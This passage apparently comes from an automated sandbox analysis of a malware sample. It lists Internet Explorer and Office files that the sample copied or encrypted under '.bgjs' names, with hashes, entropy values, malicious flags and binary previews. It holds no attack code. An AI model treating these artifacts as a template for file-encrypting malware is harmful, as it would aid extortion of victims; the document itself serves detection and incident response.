                                                                                                                                      SHA1:5624E32E80117BA0B00FE142E65FF02C9A5F7FA5
                                                                                                                                      SHA-256:23C66E8D42B06C7FB46C8C8376A09B242969D8708BF7CF454E0F3E202137D2CC
                                                                                                                                      SHA-512:71D6DB669D53462BBB0A1B18A85574D185A5DA0330112C52574657F022EB5D75986C48861D28F767B3EB297C92923C76DB097797926D746472038F7471D01423
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......t7..:..1u.~|x.M..-...0. .a.?.y@......<....w......L...!>ZJ..>.. ._."c.m.&CI.g......q........+..L.m...nq.....+.......s)..V..,..y..&...p...J..w...6Rl}y.`$...E.K..i>..F.}...J.ou....,T...rbs..-m..F...s....R..eQ.g...K..In..........S..Re...rB..2..m.P.A.o...S..N.k.=j.............l.o.|0.......bQ.f.I=.N2E..>..Vw.....X?.x'.o.'.x+;..C.?s...)]H.aB.. ......&.U_..S.. .>......v..z..*...E.85.r.s.x"M7.n..*.de7...9Rg..@(.....N...b@;...$R.g....a.C..O..... ...@...T...\.".g.}....h...)..~i.j.fN.g)JdHE!.H[..cXX..$.E....t{..E.@t...-I.-..........!..a%.Fj1{5..x.:c.g....n&.qM...F...`F...$3..G..'Sevi...8..!O.q ......U........]3m.....~1KC.m..V}K.......Hd.6&...9..J....U-..R..../....Z..%.U..\..X+..&.w.T.......*..../,.8..b......;....`.....>..L...X...CE.-o.i.}-O.........Q..!.|.K.K1{%[7.-=.~....t.....t.......m....".2.]x...=4...0`.a..J....7..y..@. #..v.K..f...9G'1..Y....?=...7.`.r..^...".mZ...lr.j.....WEq.{DY.h....p...*e.'r.....c0.".]..U~..S..Y..BP...a.Dn.....c..k.i

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3384
                                                                                                                                      Entropy (8bit):7.943016740284594
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:QsUs18e12PGH2G8fSWNvTuvOvbhuvnw5nXsi:wse0O3G89N7JzhuvVi
                                                                                                                                      MD5:0D65AC5E4B9268903718632BC605B7EB
                                                                                                                                      SHA1:76AA1C1055D6879C3A71A78D04F47C1BC7B9D065
                                                                                                                                      SHA-256:BD089FA8A578A324CD7AA11E51CD45D29A96515B67EA8D2BC60955A75EA39415
                                                                                                                                      SHA-512:F3AE249AE5497B7ACEA5B90C5728628F5AA087307CFEBC01F2BEA268C812BD1E5B3D1FD36C529E5E221EF4A98AF9A8F3144DEF37A4619B8B2DB0265E4348A401
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml-'...a.b..8.....H...QT9.[....)."j..1.7..,~....7M.}k..t...nI.&$}W.D.R..[VRV%$.Y..~..V._u.E.J...+...J.J...L4$......F[.%6.....D.......}G.?..M&. ......P}B...f...........C...)2..a...ROu.].x.B..at!.7..r.7.3W9I.....(V.j]...T._...8N..Z.A.8..T..'.U..jA./..e.....e..<..)9h..."..nf.6V.}.......".....nl.<.n........|.F....D.E.....`.......[;Q.hH.................;......^L.S(.i]. ..[....d..0j.&.. .>0Yo.1...78i.m.VHD2..T.6..O....6[.P..{4...V....8H..=..Xb`.>NZ1...@sS.y....ru4..c..d.tP..<.).\.n.M.G...2.()..,i...]...Ee..>%M...QE..b(..y......U%V....7c.1>.. B2..b ;.*..2.M*...........u.s.....)...W.....d.wU5.X...&c.}._....->p...@..e>.w.X......\......L|3.-JQ......J?.K.......y....)HF.X4#........Y0.@.|..~..s&....LU(-i..|(a......<..J5.J......s.ta.._..q.1..v...*.1..R.o..8..)..'..=.*f...3..&..[.....<3....h'u...Y..?.%...q.a%.....%V...8....:.a.=....s.....p..0....+.+E.}....i{..8U.W..>|./.V~..i..?..~p{..I.).qr...!..<\.%..D".. ..h6q..9Zn*.9QK..~.`...:..P.[&.

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\brndlog.txt.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6910
                                                                                                                                      Entropy (8bit):7.974542951749912
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:Onn3iHfA/bw4pT+ClBAHiNxZWVNXoH0+rbYNMLODhvVs6px2UVvAKmW5rfUL2AS:43iHfT4UTCR6CpY2yVJmKmW5BAS
                                                                                                                                      MD5:1A1F6F00A999A84D6F59325D01F1B8AC
                                                                                                                                      SHA1:9574A6FA9B34891A2D36A2935DCA07DBF4C39EC9
                                                                                                                                      SHA-256:77F9A6A559A1B220FC709BF6CBA71104E3C705F21615BE59FDEE5AA4FAF275F9
                                                                                                                                      SHA-512:B2C38F4A752D69C47E64459A361C2E81D83334B289FA1F49660A9FE75CFEDE52AB36E403CE7B570E90F4888F3E0D015A3A4E99A39520FFD12FF9EB39ACAB7897
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:10/05...#..r.Fwh...R.4..Yanq.....,.qr....n.}^.#Pj.'7)...V....75h.n...k.7W.z..y.kr..../.y.>.v..G.H.....N.....[........"...}......*5..3.....2..c.?.r.._...N .:.7b.......S~L..<..tQoi.7.z.....9.....)...^S.P.'....H..0..F.....I.d.;....yI.Md...v.u.*..y e...j..<.).fd..2cT..&y...P..6o..g....A....t... .....D....`......}>................U.6...Vk&)../.3Q..5:H..I.x...s$.q&V.rP..q.......].L../.Ms...u.>-..j.*/...t.H=..P......Mn..8..T..B3.G.p.P..CY...7y"...p=.<.\..]...k=x.'/.r.^. ..M...l].^.h..C.Q...h~V..E.&g.....Y..7a.w.3,..'...V..H..K.PZ.M?.V?^b.....a..Z.S.]....B.IK..n.0..T.....9.....D 6!.M.C.. M..n.K..4........._...fv.2...AO..;.)$.f...{Jc.LD.{..I5W1./.J..)~1..._.n..h..:Tb{e.?gY'9..7px...*.k.8......]I.z../{...nFLp.....l0M.Z..............+..S.V..kHfh..N..5...>s...)...uBU.....a:.....WD.*.N.l.....'.NP...]}.....1....:...(......C.c.W+....80r.4..x.i.C.......,.....Z...a.Z.Q..*..bG...H.*.S...W{.i(.......Kl....6I.?.1NP......WF..w?.....Xf{..rT..Z...o.....

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):834
                                                                                                                                      Entropy (8bit):7.777722038329751
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:QI6EkprEz8sWAhQSFULBHNkKq9+NWh2eKAObD:fjWyQSFULBHNkKq9+NWhRhsD
                                                                                                                                      MD5:7AC41F6427EF61D876A673A28E315093
                                                                                                                                      SHA1:E16ACAEA283F6D6D15404F562C367359AE672CCB
                                                                                                                                      SHA-256:C2B812FF22F34B7D5EF37E8059863F3515B7DD0EB9A2794F3F4DB16308D0B64E
                                                                                                                                      SHA-512:5B290E4B864516A76F9FBE82D795E2FA509CE2CC096D1F08CDDEBED0530257927A95F4698671037B14C104C3756A61C1D81B4EFC9B2E8B78F7B67184B528D387
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..1.0./2..9....p...}P...f....4Vg.*1...K.\G..9S.>...s....s..l.Q..3.40M@jz.ph@.\!..aN)w..*z..........m..,Ep;.o.e.8]..QHz...5. ...h.LX.28b<..F.........$t....Y..+..c..f....)..5.h............={..I=P.T..r..u0....v.Y.......E.,g..D...oz..._<s....k.K.a..g".c/....X..F...g..@C..WQG..A...Yd\8m.1.i)..P.Uea>....bP.@+G.'{...L$...Id......yW9......2&.Mz..nm.^..m.....tB..2.sP...d^p..y.r.............V.d.H.4d ...;...C.[.z.z..t.......Q..+..,.......R...R..QCIcx..rzf.G.o.rnsu.(.......IwE^...!.$.g..:..e...S..L(J%.{....e.E.......0...l.....q..s..v;.....6...8K..._....S;.ad.]B.Q:52..^]L.ZbV`<#?.k7.wc..|"..W..G.el.....0/.~Lz<['n........g....PH."...9_........\M\v.L}...6...._7D).......O.b.A...q..C...J.........4S.x...G...iHc..]....j/.y...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-UserConfig.log.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1742
                                                                                                                                      Entropy (8bit):7.874823870955222
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:qD8Fo22aRUVGPNuxx8XimE+0GnYJy2nN/2n5oD:qD8FWCUVG8+i3+Roy2Nk50
                                                                                                                                      MD5:E03293CC1404AC9999CBAE43507A790B
                                                                                                                                      SHA1:1F651FD451FD7B55F747CEFF3DFD8F7FBECBFBD0
                                                                                                                                      SHA-256:0FC4791F7E4C4A7FF14DEE745801019E38DC1972A6F63550D35F5B3D9627CD9B
                                                                                                                                      SHA-512:F82523E34E68617CCC11028E539ACA9525BFE5BF62B660A00B2DCC9539451F8C370DC2ED0823ABB69809856CD39A0602E02F4E8E475BBBBB5505E5A0B27E0A44
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..1.0...L9.%e~K-Z..r..)c..&...r..6$....o.<..m..Fz...\0.P.cv0j.=..90.a....=....TmM..\nC..*.....WV..Q..+;.....#.........{(.5.}0.:...o..... ....r.)....I.S..;.q0kC.<w.T.3lvf....7.....q......&$.......[z....a...)7~.4.".L....|...cn....... \.....>1..O?;...=..........3..;jx}.N...q.|..[./.q{f.J.4...'h....a...&4.=.9....P..x.>%=..'y4[....X+....a7>...../)X..:..T .h...De5..YqF\`.3dU70.....odUb.|.....aO#&.....C.*4..........!.J....y..&T.p.^{.k..].....E...-./..Cf...f......1.YB<d...1XD....'...Br.0..p.TN[..$7.ws.(...kY..T..-./.....$.q..nF..;*T.#..:.>...}..s~<S.M...[.$.{...`P...p.{.7.%Ho..8..1..m.w.....G8P.=a........yB.@.(T....K.....{..G....tj.I....wX*../xI..?...4...%R..CL..mZjE.C.k.31n.|.....g$.....{L..?k..#.4...~......[.j....V. .._.qa.8... I......'.z.h.V(r.mWDh,.M..-..^._.JZ>...........@.nM.......K.NK......A%.....S...z..0L.._....A..D.4..,N....\...j..5.6...r.F..../.B.....!&;.1+D1.Hz..P.VI.G.T...2xb.....%N..}.>.O...>7..s\.........}..E.a......v}G.f B...(.ybH...

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\16.0\excel.exe_Rules.xml.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1062891
                                                                                                                                      Entropy (8bit):5.5300860146170905
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:qlg4WQ1+S6aK3XSZlV0N8x5thr291gess3TylunXR:uW2V6aKz
                                                                                                                                      MD5:C66A888CC72AD53E430960F4F7A814C5
                                                                                                                                      SHA1:23370748A48A66CF7BB0CAD646A2CECBCFA35AF5
                                                                                                                                      SHA-256:991C5217C871DD9A8B022F9A0DB046110A6D15223CB3F0E9CDCD751B7A259D94
                                                                                                                                      SHA-512:C9719813BEBE9516D1150BA2FA876E82E646F09F9C9F30F225D22E4C3514D9B5C9D5FCE885811BA78C6C15578E34429F39B8B0F608EF7C7AF997B5DE98DC3065
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<Rule.C.=.Hx....U._....[(.........s..... a..}.L...$g............Pv.UF.x.....>?.s..."...=.....L.5j...._.|H..f.8..R.t.-2.Y.58..t.<.wv.].(.a\.....\ ..E...... .,.....wJ.W...z.;..M)".K.Cd..b(.2.|.D._...H.._.C.U.9.oB$.%...-...Kd.....-..J.C`.~M..#j.T.k........{......sA.Z...y......~G.Yi..o:....y<,.M.Q.............L.:aU.B........E....|.".k............Ykp..]l..$./87...qb.!.....K..[.g..".|f..RC.b.l........b.t.p.P....8B.Ae..A.L8....-*H...L..pJ.Vt!v .7.Q...}....r....A..U.5z.......t&....W..&....-}_...@$d4......A..H.Iv.S....b..........[..xh.@.......F...KQ.Wpw..$....m.&.}..-...h6..f....(..}]...N...)..{Iu.D.......1]?....(...M..}.3!.....z....7..l.kx...^..c5.BT..!yx.A.w`.0..b..'...5.}]!b.4..{iZ...12..V. ^n~....-..B($..P5...X...<.rA*b%a...F(..mN.I%.9l.. ..]4wj...r.h.:.1>y...&.}F.m...z.RO/=....f..#;.@....i{..6.*.g..+.<..TfU..$Z9<.7.yT.Z.._#\..(.>(U...1...\+75x..HP/...#......<..............r.....70.....K.#f...3:i..w.N....)QN..@..p#......q.T......

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):320311
                                                                                                                                      Entropy (8bit):6.632785908716544
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:ijfRy3YvICy7cY3QXFqxzLVThT4ZoGGQ1jQc2G20Ei9J0CE9SN:cRy3A47FQXCzH8oK1Jei789c
                                                                                                                                      MD5:1823790EA6BF0783C41E95C1C42CE043
                                                                                                                                      SHA1:2392802A90CEE768ABE1272429ABD1FFEE598F30
                                                                                                                                      SHA-256:48C5B6EB9A76115833A2930834E1865028B4363FDEB1CDB7E70C761733CC199C
                                                                                                                                      SHA-512:7BF82CF334AE9C43B0BD133EC90229A7118E05BC28BB786B537B4DBDA919727EA1F7A675ABB1F795C7989CFD785179E82588D41C28A4DF723336D4E84F503531
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<Rule.^...U.0.!T?<......T4.g.*.B.;..8.8.{...]FK....M.@.A...\7..8[...7.@0..k.=.RH./.~92K."'.K9..Rz.=0....K...\k.>y..8VhE.#..y..!...1....Tq.....@...|OI.......M8R.r...^.p..W.l..).a..J+....w.9......V....)f\.y.h..Z.$N.H.3..{;m..&.........q....).mj.K....*..b.-..w...._.....EL. s4...j.......&.n...q,.+...k...'.s..eR..JYa.v........Tw.......D..=af@AySN$}pd.....,_..6.L....G.(.A.&..vD$....d.63...,.E.FJ....*)b..s.m.......k.....)....i6......I..P..S.eX...DM-....Fx.......7...+.~...u...7..{@.L.&....P..%!y...:".E.D..p:...'`|[. .9......B......Z5....l..j...1%@......K.1.+.hj..~:......i>..j.......-.6E..@r..A.xd.by_.+,a...Ac.~Pz.....,...-d..\^.C.O.W....!..f..?...b....~....1.t.kV+...p.....&._.....flD.T1P...C....L..#.F....%."....H......hy..Ju.i4..67..+.Cg).....#.U..+..&3..T..89r...N..|.a..au..........e...'.A!#...#.... .x.."...a"w$W.. ~.0,.w\.........)...=.W.@.R.o...].^.Y/K.tPk....fS.RU.tT....~.t......9.c..}........yi.bq...........In..=.r..z..y..k...~.p......d..b..

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):361051
                                                                                                                                      Entropy (8bit):6.514407538067786
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:qQpYHxPsvc+JPuAE6epeCNLBRzQ4vsDdwd+DxFiu:3Xc+J59aNz03e+DDiu
                                                                                                                                      MD5:58CAF9E5AD31700E2422E52A1D60369C
                                                                                                                                      SHA1:529212E9461DF57F67AFA8C6482AE92AEE681B19
                                                                                                                                      SHA-256:193FD40A4C8562BD89C68CE7E4DE035CF80312FC414561FCDD233277ACB66142
                                                                                                                                      SHA-512:EB0211F17DB05F52DED33566300217295945167CD53BD7D962764B978F081A6C61EE38521D72EE1BEC7029D662C748D099451E6BC50635C441EE8F31B00B3141
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<Rule...Cj....:..J..c[.{TU.g...}....pD.a7.B.J.P....w.;...&.......$.|...V...E.0.l...t......x.-..,%..&.2O.]B.PX(T,......,sL...cLf....7...2k..PU..m..~..*....t..3...H...Tm...<(.T=.`..|p..2.O....L'{...........4.-..v.#cv..+..5.N......8o..".....\.p2..#..v.Pe..p... ....,Z.|>_.\?/....M.c@...O......\.U&.l.$.....<...j@.`".......CL:.24..A....6Sk`9V._..Vc..j.gm..a`8....k.......W.'.h.........h0.......%.9|....]EE.DDt<%..7...A.8...$Y..{,...>.O5....rV.20..M.*...7C.s....<d..)..S(.........%N..>.#.(<....Jt#= ....9U.....`..^.E...1.b..56Br.j...2f.....B5...........^..I.<I..b..y/....&S6...Q..W<^U....k...g.U...-.;?)...."$...7.90.G bokQ].m..R9....`&`.^.A6|q.iZ'{...'S..Y.#..G6Q.q..ps.E.A.G.....%.e.eP...V...d0.I...;o.G#.i..........c.s*.....Gh{.....7.,..BdYqj.Y.,...*.5..N@1m.A'.(..&..<...|..-i......Fi......]O....+....x.z.g..cM#..x.W.(2..)....,..U}5W`.(....@.`S|/}.<.qk....Y9.J....L..Pr%.9m/..F[.58..rm...568.-..U=c.......6.D...^3=.....a.J.WD{=F.......\......O.@kj&..mt

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\Features\1-7FeatureCache.txt.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1098
                                                                                                                                      Entropy (8bit):7.802078890232317
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ZKsHg5rBzQnT7eqFEyZ61ptMUB1w3QYoBsuYbD:ZKsHgZBmdbOtp3w3QTs/D
                                                                                                                                      MD5:8235F2FF96B7BD7B5C4A7DEB82DA9F28
                                                                                                                                      SHA1:E2A5DE5EB6203E4F0BD06491BF818CAF6F171E5E
                                                                                                                                      SHA-256:4340E7E567C9A2A8374E0F2C14D9C679B636C4438A4B98FAA8E2E02849C8AF1F
                                                                                                                                      SHA-512:72D4A998CA407460FB56AD13A54CC94921A4E7CD7F4B830C731AD063132323FBCE5D856451CE74452FB6946DDE0D6F46318FF269BCBC6BEAB86667A61E0B3538
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:3.7.4..&.4../..#[5..dr..D....\.fspN.s...Q..[....2J.t.w..0.....1n@:!IX.!..x:h.y.].i..G.....K`.......R..f..U].Y.P...#$....A1..#R...?nDG...\=%"....Z...#1u.?d\.#{eLa.OK..7..e.s..,...v.m..w....#+.J...,1.... X../\.....3..dP.D.u..|;'...qh;...#.S3.V.u3...(O..Tc%=.sk.{.....}'....&.*....s7(-`..O).6n.h...8h.l.. .N|{K.Oax...R...(.....m#..`!Rm.;)....Pi-......H..*...|Y..o..U.,Q......e}b....B[..?.......8../....%.0..Z....r.au]....6<S..........n'..a.....4..5..wE.=}.T,[..{.}.&..x]...=....\.*..,;fK.*nlB.\...f.Nzn&...wfm...9.I..E..DB..q.R.;.8.`.B*.z3)@.;y..w.v...NO.p.#..Qq....\...LH.C...........{.~N.g.<.....].Y....;C.....O.z......,...&....s.rI....vB&qq..X.....c..Jvf/...K...._..F.pC.Xj.z.,.q.1.KlH...s.$.-..mu....h......9Hv..Q.V.._b3.?.....z..O..U...}.......x.*E.5...../U ]......C......{...)..".4...H.v.t............"@......f+.\.P.xrr0....n.Iz....`i.q.R,...dC...sl......b..P1{S.."&~.M..j.z...N..=..lT]7j%f.o.?.,aL..I...lm./..A....E.>.*&..g..BE....T{^..ZN....)

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):24910
                                                                                                                                      Entropy (8bit):7.992864955445798
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:384:mIhuT33T6/I9M9oscZIQoW+OxuyVcwSImw9rjvEFUlihybHn/AvW+ELJitx6aghC:ciI9MLca0hSI/QRhybHnI+18XY6SK
                                                                                                                                      MD5:F35AECF49D58AD2F0A03F8766AB61816
                                                                                                                                      SHA1:03B3A348B372FFF7E4E9641E3772D318383FA129
                                                                                                                                      SHA-256:9FD083639233EDA0E3C9F42C9CAA030F2E3DB9EC648CDAAAEC988B467D275FCC
                                                                                                                                      SHA-512:527F7627097359F0552715E806F507FE75CA348F955F39F2469643E413C59BC9B43C0F4F8C4AA6EB845D660676E6DF180ACA79A2BDB3F11152074289BA104978
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit.?..QM Q.6j40/\%..f"._O.Ld..*....P;.~.O.$Ix4..A.'.g.fR....s..;F../..%..ROE-,....L..E.C.>..f....-+iO*x..L.`.y...........G:8O...d...F......,....,}Cj..k.k9.MsO.<......}.QJ.c./+..nt.X...!^.W...J.I.....a...Y....K.ir.d*.4m..wQY...MO...D..F.r..+3...D....^..........).{M.4.......Vx0e.z2._.!!.^..uyD..jK..z..w"uT........F-.`'b.uO..mC...Z.....[............)2h^Z(!..GSq;r..$....c_.....(....C6vzF.>...e...s...YZd...";...u;u.vm.[}(NN....U.........u4u.L2.\...U.y..._.-...:...DJ..O...Q.$,.F8.i.._.jL..2.u,...E...v....;5+.4L.e.....Z].....5x....Ab.C.DX....kw.5...l>..dg...........9X..+&x.....rQ.D.E..T0.s..%.{D......e.%..g.....^.2....u.P..4.W.......^.H.e..&.b...c..t|hN.tVHo..k-.F..j.mp.c..n..vp.O.X....'...D._a..p...&.._..g.b.3*.....$,..yd.....?.....E._.8.r4A.n-.l.Uy].!wa...2F.J.M.(.....2...Axm.%.p..&..p.a..W.....(.D...&....S..~.z....E....W..> ..D..X...7._T!=.0..i.h.........\..E...h..>1......5......3..U._K5.Y....vGSo.TX-.&..F.^v...)....nF..V...!QM("%.

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):24910
                                                                                                                                      Entropy (8bit):7.992619786228708
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:xI4Fc86IRC4MtipL7wFmvPQ2n2uON2Va6jNU:xI4FczilpLKyAukNt
                                                                                                                                      MD5:53E1A701B676E4854676CE2D40218CF3
                                                                                                                                      SHA1:5447989C1585FFD1B0B430072D54543B2DAE0CE4
                                                                                                                                      SHA-256:0622D254946A130E853FF1D10646B605ECE6D4F900FF20F9317A5F540862EEC3
                                                                                                                                      SHA-512:C7AE41CF89782E3437A07D2C7BDAAB1D80E913D7FF9860186A48E796506414516E125A94AD6E93D25C8B5FD3DA1282E18C541740728C570B74626D08CD819B8C
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLituq.^...-.K.o.o.x..5.....P.P<....J...."c../.m....H.'ub.2.m..,d.p.<:<.9..V.C[......e.Zx.'..B.>y.m....{.~#._.....n;...\v.mX.OZ.-....Z....;.s......c........0T.........V..< .-.+........BN.J...f.....r..:..3n...........0N?n.l....w>s..`..Iw....D...c+2.*.zH.."hF.>.g!.9.@O...lL.|&.....9.+tx.].5hJ'.....H\#.k..|.Wv.R.3k'..8.....".].D..h...S!.0q.."..3E.:...ke{G[!..($u...p9.Lab..%^".5.<..<..z...`".y......Q.es..W#..4.`.#./.r.\..... ..N_..../p.#.Ca...........h<..5..&.qT."D#.5...;qA|X....u.G..-%.h0....$.........E9e.......y.T...._8!.l.....d.}a{.d...S.cl.%!....a.. ZH....5,...G..UN......#.j.W......'.b..........&Z.rnK...IKH..<.l .}..i..w......jGi$..&>..{3DG...^..h..M....Fm...>...b...R..A\...O......uD..g..C.s..C....B.;r.t..^Y>:...H.-.^..}...4..C}.....PC..0...$6..m]..p^x......i-....=].U..*.6c....N.lE...RR...J.uz~b..49Tl&.....@.Q.J.3...k....aC.5g z .....a..f.{.p,jE.......(.......I.M....].}..X.:{........%n.]...>.W.Kx]..O.(......w.X...f..~...GS0.eD*..l.

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):24910
                                                                                                                                      Entropy (8bit):7.992919516232106
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:rtKYCehY8L1v56Zw8+zlDVjhucuBkyI8aH:rtKYCeGOflDVFucQkMaH
                                                                                                                                      MD5:A6FE47CFA0DA05EFA998CEEB2F2DC3AD
                                                                                                                                      SHA1:F24F4669D0E897962B86C4E76CD71DB9F2DE5887
                                                                                                                                      SHA-256:F338904510014C50161302BD2256D4F7C25ABF7A6FA412F4021986933883BFCE
                                                                                                                                      SHA-512:36FCC0086BAE1E0F90705BBC11DD7D36B5C6A00A1DF86BC218D97B7E8807ACC4C7A6F1A5F26F7918FA04FDE8945FEF52A533D7D914FF025BE11A76DB03813980
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit......D.r~Q.h..Z.F1...b./D.Z..e.b..v...)....@.....:{...t@^....ur......#7K$... .D.w....0.2+..F.i;....R.}.^+...X|.m.<..X.V.C...'..O...S..4..E..;#.x.=')..M8.>..GG.....oW.......\.tN.S].....L.....r...=.h......^.A|......7...6....o.w....%.....oBBq....TJ.*.O.+2L..Bqf..".?..u...|..v.^...UJ.B........+...aHw-W..?..^(.nDC...f......I{.~\@.z.y:I.....;..um..vNR...7.R..(4.....FgJ-.R.....Q.p......6.V.5..2...`k..S..1...pq......c.p.PS1(.p...>aV......6~5:..kD....0E...v.?....wx......h.......Hda..|2..z5.W......ILg....|h.C..a$qJk..w.(.*%.ys#.zP....wJ..>..N..E.V.[..=....;......i. ..L.....zP.U.h...-......7.T..A^..jj@.M]..+g`.&..ldl..j.Omm.*...p..%.grO......4..s.$..cf.yD.2.5Sc.>...K.3..f....O$...>uJ........*n.....\.oy7..d..^./..-r..gvL_................;.F.26.#.<.%!34.S......}m"....=.....F..7....O..9..`7ZD4.wG+..-....u.....q;_b.Y'.ZB..;...{......".5N_....&1..A.|.|G..&UWY.?8..!.1...^.....*..6S....&n|.JX8.R....I^}W.6.e....tP. ...m..Gb..L.ui .iD\n..&..4....cZg

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):24910
                                                                                                                                      Entropy (8bit):7.992971417129742
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:K++kBWx10iAuLl04y1z9acYWtScesQwQVtntQ:/+ksb0iAuLl0lTV5nQwIQ
                                                                                                                                      MD5:1FEB2F31537A1BEDCD47C9F2F73C5965
                                                                                                                                      SHA1:9332E0BAADB7FD637E7830B5405C9489C162D055
                                                                                                                                      SHA-256:7525928606DD6879DE19BF28160AC5BC285DC9FD6509D6C06DFB3E7DF1AFAFDD
                                                                                                                                      SHA-512:1C140D6DAB3A3C72003FEB339EFA7F696C4861C404FB2FE2CCA7697CE2758E1640DEDD6317210CED8A7414B92337205013514C08B647962B4B59FE39A1E080A5
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit.v.f...eZx.l6...A.~.I.1..cp....K..ki..+.^.Y.P-I..6../.S+D1..$F?..I.t'.3G...G.8.~..&.{........0.l...B....-..3.fO4N....M.. .D..6w.!. .(.6/.w..%.......r.`L..L.1...mn}.w:|C......J.S.O.v....r...U.B."... .H).*[.}...x..Gb...I..K.....&.0U.>.z....}.S.`{.`..;>x....s.n.j...]....hG .j|v..N+B.kD..e..U......O..Y.....+.9h.<..o.......8.|....6.}.;.Xn.6..*W....H+...b|.+uI.\A.!G......z!...?(..=].H.w.zov.%.3..`..bF*r....w.........k./...K..d......#.1".eM.]...}....#xHb.5.qz.....rb...J..7Q.i5..\[@..As_......5....!..!A..aA...7.9....r....F9...FcB..Rn...s9A.G[....c.s0..=G.D#.,.|.....HV.n.3..YT..as.Rl.B....b$.c..yq.YB...q...J.w."... <.....dJz..Q...D._%b.....nm....A+M6^.fo2.5...^E.k...M....._.(o8O....Y...@;.5)s.sB...H...Q.(..OC.93..nK..ND.$...zA..w.....l...6.TT.oH...........'y..`@...2.'bzt..h...-....j.`.Ry..0...,..S......}....d......:\..-A.P.,<....(....x~...f.........k.=..Q>..N.Z.Tg....4.....64O.0.S.....a.......*yT.m.<i..,..$.h.g..-.25.-..Z.

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\PenWorkspace\DiscoverCacheData.dat.bgjs (copy)

